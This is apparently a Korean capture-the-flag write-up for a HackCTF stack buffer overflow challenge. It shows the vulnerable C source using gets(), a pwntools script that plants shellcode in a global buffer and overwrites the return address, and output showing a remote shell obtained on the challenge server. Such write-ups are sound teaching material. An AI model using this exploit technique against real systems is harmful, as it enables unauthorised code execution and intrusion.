내 버퍼가 흘러넘친다!!!
Source
1
2
3
4
5
6
7
8
9
10
11
12
char name[50];
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s[20]; // [esp+0h] [ebp-14h]
setvbuf(stdout, 0, 2, 0);
printf("Name : ");
read(0, &name, 50u);
printf("input : ");
gets(s);
return 0;
}
Solve
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from pwn import *
#context.log_level = 'DEBUG'
e = ELF("./prob1")
#p = process("./prob1")
r = remote("ctf.j0n9hyun.xyz", 3003)
shellcode = shellcraft.i386.linux.sh()
name = 0x804a060
payload1 = ''
payload1 += asm(shellcode)
r.recvuntil("Name : ")
r.sendline(payload1)
r.recvuntil("input : ")
payload2 = ''
payload2 += "A"*24
payload2 += p32(name)
r.sendline(payload2)
r.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
➜ hackctf python prob1.py
[*] '/home/ubuntu/ctf/hackctf/prob1'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
[+] Opening connection to ctf.j0n9hyun.xyz on port 3003: Done
[*] Switching to interactive mode
$ id
uid=1000(attack) gid=1000(attack) groups=1000(attack)